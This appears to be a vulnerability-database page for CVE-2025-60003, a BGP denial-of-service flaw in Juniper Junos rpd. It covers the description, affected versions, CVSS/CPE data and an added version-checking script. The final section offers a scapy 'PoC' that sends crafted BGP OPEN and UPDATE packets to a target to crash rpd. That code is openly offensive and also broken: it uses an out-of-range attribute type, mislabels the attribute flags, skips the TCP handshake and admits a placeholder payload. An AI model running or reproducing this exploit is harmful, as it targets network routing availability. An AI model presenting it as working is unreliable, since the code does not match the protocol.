Security Vulnerability Report
CVE-2025-60003 CVSS 7.5 HIGH

CVE-2025-60003

Published: 2026-01-15 21:16:04
Last Modified: 2026-01-23 19:39:26

Description

A Buffer Over-read vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS).

When an affected device receives a BGP update with a set of specific optional transitive attributes over an established peering session, rpd will crash and restart when attempting to advertise the received information to another peer.

This issue can only happen if one or both of the BGP peers of the receiving session are non-4-byte-AS capable as determined from the advertised capabilities during BGP session establishment. Junos OS and Junos OS Evolved default behavior is 4-byte-AS capable unless this has been specifically disabled by configuring:

[ protocols bgp ... disable-4byte-as ]

Established BGP sessions can be checked by executing:

show bgp neighbor <IP address> | match "4 byte AS"

This issue affects:

Junos OS:
 * all versions before 22.4R3-S8,
 * 23.2 versions before 23.2R2-S5,
 * 23.4 versions before 23.4R2-S6,
 * 24.2 versions before 24.2R2-S2,
 * 24.4 versions before 24.4R2;

Junos OS Evolved:
 * all versions before 22.4R3-S8-EVO,
 * 23.2 versions before 23.2R2-S5-EVO,
 * 23.4 versions before 23.4R2-S6-EVO,
 * 24.2 versions before 24.2R2-S2-EVO,
 * 24.4 versions before 24.4R2-EVO.
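As an added, defensive example (not part of the advisory or of Juniper's tooling), the following Python compares a device's Junos release string against the fixed releases listed above. The release grammar it accepts and the sample inventory at the bottom are assumptions; unlisted release trains are reported as not covered rather than guessed at.

```python
import re
from typing import Optional, Tuple

# Fixed releases taken from the advisory text on this page. The first entry
# (22.4R3-S8) closes every release train up to and including 22.4; the others
# close only their own major.minor train. Junos OS Evolved uses the same
# numbers with an -EVO suffix, so one table serves both families.
FIXED = ["22.4R3-S8", "23.2R2-S5", "23.4R2-S6", "24.2R2-S2", "24.4R2"]

# Assumed release grammar: <major>.<minor>R<n>[-S<m>][.<build>][-EVO]
_RELEASE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:-S(\d+))?(?:\.\d+)?(-EVO)?$")

Version = Tuple[int, int, int, int]  # (major, minor, R, S)


def parse_release(release: str) -> Tuple[Version, bool]:
    """Return ((major, minor, R, S), is_evo); a missing -S counts as S=0."""
    m = _RELEASE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised Junos release string: {release!r}")
    major, minor, r, s, evo = m.groups()
    return (int(major), int(minor), int(r), int(s or 0)), evo is not None


_FIXED_BY_TRAIN = {v[:2]: v for v, _ in (parse_release(f) for f in FIXED)}
_OLDEST_FIXED = _FIXED_BY_TRAIN[(22, 4)]


def is_affected(release: str) -> Optional[bool]:
    """True if the release predates its fix, False if it is fixed, None if
    the advisory does not list the release train (for example 25.2)."""
    version, _evo = parse_release(release)
    train = version[:2]
    if train <= _OLDEST_FIXED[:2]:
        # "all versions before 22.4R3-S8": covers 22.4 and every older train
        return version < _OLDEST_FIXED
    fixed = _FIXED_BY_TRAIN.get(train)
    if fixed is None:
        return None
    return version < fixed


if __name__ == "__main__":
    # Constructed sample inventory; hostnames and releases are made up.
    inventory = [("pe1", "22.4R3-S7"), ("pe2", "23.4R2-S6-EVO"), ("pe3", "25.2R1")]
    labels = {True: "AFFECTED", False: "fixed", None: "not covered by advisory"}
    for host, rel in inventory:
        print(f"{host:<5} {rel:<16} {labels[is_affected(rel)]}")
```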

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:r1-s2:*:*:*:*:*:* - VULNERABLE
Junos OS < 22.4R3-S8
Junos OS 23.2 < 23.2R2-S5
Junos OS 23.4 < 23.4R2-S6
Junos OS 24.2 < 24.2R2-S2
Junos OS 24.4 < 24.4R2
Junos OS Evolved < 22.4R3-S8-EVO
Junos OS Evolved 23.2 < 23.2R2-S5-EVO
Junos OS Evolved 23.4 < 23.4R2-S6-EVO
Junos OS Evolved 24.2 < 24.2R2-S2-EVO
Junos OS Evolved 24.4 < 24.4R2-EVO

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-60003 PoC - Juniper Junos OS rpd Buffer Over-read
# This PoC demonstrates sending a crafted BGP UPDATE with malicious optional transitive attributes
# Note: This is for authorized security testing only

from scapy.all import *
from scapy.contrib.bgp import *
import socket
import struct


def craft_bgp_open():
    """Craft BGP OPEN message for session establishment"""
    bgp_open = BGPOpen()
    bgp_open.version = 4
    bgp_open.my_as = 65000
    bgp_open.hold_time = 90
    bgp_open.bgp_id = IPAddr('192.168.1.100')
    # Add 4-byte AS capability (may be omitted to trigger vulnerability)
    cap_4byte = BGPCapability()
    cap_4byte.code = 65  # 4-byte AS number
    cap_4byte.value = struct.pack('!H', 65000)
    bgp_open.capabilities = [cap_4byte]
    return bgp_open


def craft_malicious_bgp_update():
    """Craft malicious BGP UPDATE with crafted optional transitive attributes
    This triggers buffer over-read in rpd when processing attributes
    """
    bgp_update = BGPUpdate()
    # Withdrawn routes
    bgp_update.withdrawn_routes = []
    # Path attributes with crafted optional transitive attribute
    # This specific attribute construction can trigger the buffer over-read
    path_attrs = []
    # ORIGIN attribute (well-known transitive)
    origin_attr = BGPPathAttr(flags=0x40, type=1, attr=[BGPAttrOrigin(0)])
    path_attrs.append(origin_attr)
    # AS_PATH attribute (well-known transitive)
    as_path = BGPAttrASPath(paths=[[(1, [65001, 65002])]])
    as_path_attr = BGPPathAttr(flags=0x40, type=2, attr=[as_path])
    path_attrs.append(as_path_attr)
    # NEXT_HOP attribute (well-known transitive)
    next_hop = BGPAttrNextHop('10.0.0.1')
    next_hop_attr = BGPPathAttr(flags=0x40, type=3, attr=[next_hop])
    path_attrs.append(next_hop_attr)
    # Crafted optional transitive attribute that triggers buffer over-read
    # This is a placeholder - actual exploitation requires specific byte patterns
    malicious_attr_data = b'\xaa\xbb\xcc\xdd' * 10  # Malicious pattern
    # Wrap in BGPPathAttr with optional transitive flag (flag=0x80)
    crafted_attr = BGPPathAttr()
    crafted_attr.flags = 0x80  # Optional + Transitive
    crafted_attr.type = 999  # Vendor-specific attribute type
    crafted_attr.attr = malicious_attr_data
    path_attrs.append(crafted_attr)
    bgp_update.path_attributes = path_attrs
    # NLRI (Network Layer Reachability Information)
    bgp_update.nlri = [IPNetwork('10.100.0.0/24')]
    return bgp_update


def send_bgp_poc(target_ip, asn=65000):
    """Send crafted BGP messages to trigger vulnerability"""
    print(f"[*] Starting CVE-2025-60003 PoC against {target_ip}")
    print(f"[*] Local ASN: {asn}")
    # Step 1: Send BGP OPEN message
    print("[*] Sending BGP OPEN message...")
    open_pkt = IP(dst=target_ip) / TCP(dport=179, sport=12345) / BGPL4Session() / craft_bgp_open()
    send(open_pkt, verbose=0)
    # Step 2: Send crafted BGP UPDATE with malicious attributes
    print("[*] Sending crafted BGP UPDATE with malicious optional transitive attributes...")
    update_pkt = IP(dst=target_ip) / TCP(dport=179, sport=12345) / BGPL4Session() / craft_malicious_bgp_update()
    send(update_pkt, verbose=0)
    print("[+] Packets sent. Target rpd may crash if vulnerable.")
    print("[!] Note: Actual exploitation requires specific attribute construction based on target version.")


if __name__ == '__main__':
    import sys
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-60003-poc.py <target_ip>")
        sys.exit(1)
    send_bgp_poc(sys.argv[1])
```

References
